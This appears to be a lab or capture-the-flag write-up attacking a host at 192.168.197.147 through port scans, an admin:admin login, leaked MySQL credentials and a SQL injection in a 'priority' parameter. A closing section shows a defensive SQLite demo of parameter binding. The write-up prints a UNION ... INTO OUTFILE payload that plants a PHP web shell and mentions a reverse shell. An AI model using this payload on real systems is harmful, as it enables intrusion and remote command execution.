Hawat
2025-3-16
Tag
Nmap
Web Application Security
SQL Injection Techniques

192.168.197.147

Nmap

└─# nmap -Pn -n $ip -sU --top-ports=100 --reason
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:09 EDT
Nmap scan report for 192.168.197.147
Host is up, received user-set.
All 100 scanned ports on 192.168.197.147 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 21.23 seconds

└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 02:08 EDT
Warning: 192.168.197.147 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.197.147
Host is up (0.050s latency).
Not shown: 65475 filtered tcp ports (no-response), 56 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
17445/tcp open  unknown
30455/tcp open  unknown
50080/tcp open  unknown

22

brute force
No

17445/30445/50080

From the Nmap output we can tell that these are nginx and Apache.
Next, try searchsploit.
There are a lot of scripts we could use.

Dirb

Nothing found.

Feroxbuster

50080


17445


30445

We found a new page on port 50080.
We try admin:admin and log in successfully.
We download the zip file and look through it for anything useful.
We can find the MySQL database credentials in this file.
User: issue_user
Password: ManagementInsideOld797
Additionally, we discovered that the priority parameter is vulnerable.
It is a GET request, so we can't access it; we try using Burp Suite to do it.
High' union select '<?php echo system($_REQUEST["cmd"]);?>' into outfile '/srv/http/abc.php' --
Use it and try running our command.
Then try a reverse shell.
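
The root cause behind the vulnerable priority parameter, shown next to its fix. This is an added example, not code from the target application or the original write-up; it uses an in-memory SQLite database as a stand-in for MySQL, and the issue table, its columns, the function names and the probe string are assumptions.

```python
import sqlite3

# Assumed schema and constructed sample rows; not taken from the target app.
ALLOWED_PRIORITIES = {"Low", "Normal", "High"}
# Harmless constructed probe with the same shape as the UNION trick above.
PROBE = "High' UNION SELECT 'injected-row' --"

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE issue (message TEXT, priority TEXT)")
    db.executemany("INSERT INTO issue VALUES (?, ?)",
                   [("disk almost full", "High"), ("typo on login page", "Low")])
    return db

def check_vulnerable(db, priority):
    # Weak: the value is pasted into the SQL text, so a quote inside it ends
    # the string literal and everything after it is parsed as SQL.
    sql = "SELECT message FROM issue WHERE priority = '" + priority + "'"
    return [row[0] for row in db.execute(sql)]

def check_bound(db, priority):
    # Bound parameter: the driver passes the value as data, never as SQL.
    sql = "SELECT message FROM issue WHERE priority = ?"
    return [row[0] for row in db.execute(sql, (priority,))]

def check_hardened(db, priority):
    # Defence in depth: reject anything outside the known set, then bind.
    if priority not in ALLOWED_PRIORITIES:
        raise ValueError("unexpected priority value")
    return check_bound(db, priority)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", check_vulnerable(db, PROBE))  # extra row appears
    print("bound:     ", check_bound(db, PROBE))       # no rows match
    try:
        check_hardened(db, PROBE)
    except ValueError as exc:
        print("hardened:  ", exc)
```

On MySQL, the INTO OUTFILE step additionally requires the FILE privilege on the database account and a secure_file_priv setting that permits the target directory, so revoking FILE and restricting secure_file_priv limits the impact of an injection like this one.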